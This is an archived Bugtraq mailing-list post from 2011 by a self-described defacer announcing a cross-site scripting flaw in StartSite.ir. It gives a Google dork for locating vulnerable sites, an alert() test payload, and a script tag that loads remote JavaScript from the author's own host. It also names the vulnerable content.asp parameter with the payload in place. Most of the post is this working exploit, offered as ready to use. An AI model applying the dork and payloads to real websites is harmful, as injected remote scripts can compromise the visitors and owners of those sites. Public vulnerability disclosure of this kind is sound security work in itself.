[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

StartSite.ir Cross-site Scripting Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: StartSite.ir Cross-site Scripting Vulnerability
From: md.r00t.defacer@xxxxxxxxx
Date: Tue, 5 Apr 2011 07:22:33 -0600

#------------In The Name Of God------------
# StartSite.ir Cross-site Scripting Vulnerability
###################################
#AUTHOR: md.r00t
#Mail: md.r00t.defacer@xxxxxxxxx
#Website: www.r00t.gigfa.com
#Forum: http://ajaxtm.com/forum
###################################
#Google D0rk:
# "Powered by StartSite.ir"
###################################
# xss EXPLOIT:
<script>alert(/0/)</script>
<script src="http://md-r00t.persiangig.com/xpl/XSS1.JS";></script>
######VULN IN HERE##################

/content.asp?Catid=247&ContentType=<script>alert(/0/)</script>
####################################
#TNX:
#Ajax Security Team,Aria-Security Team (Persian Security Network),hadihadi & 
black.shadowes(Virangar Security Team)
*****************************************

Prev by Date: [security bulletin] HPSBMA02652 SSRT100432 rev.2 - HP Network Node Manager i (NNMi) for HP-UX, Linux, Solaris, and Windows, Remote Information Disclosure
Next by Date: [ MDVSA-2011:065 ] logrotate
Previous by thread: [security bulletin] HPSBMA02652 SSRT100432 rev.2 - HP Network Node Manager i (NNMi) for HP-UX, Linux, Solaris, and Windows, Remote Information Disclosure
Next by thread: [ MDVSA-2011:065 ] logrotate
Index(es):
- Date
- Thread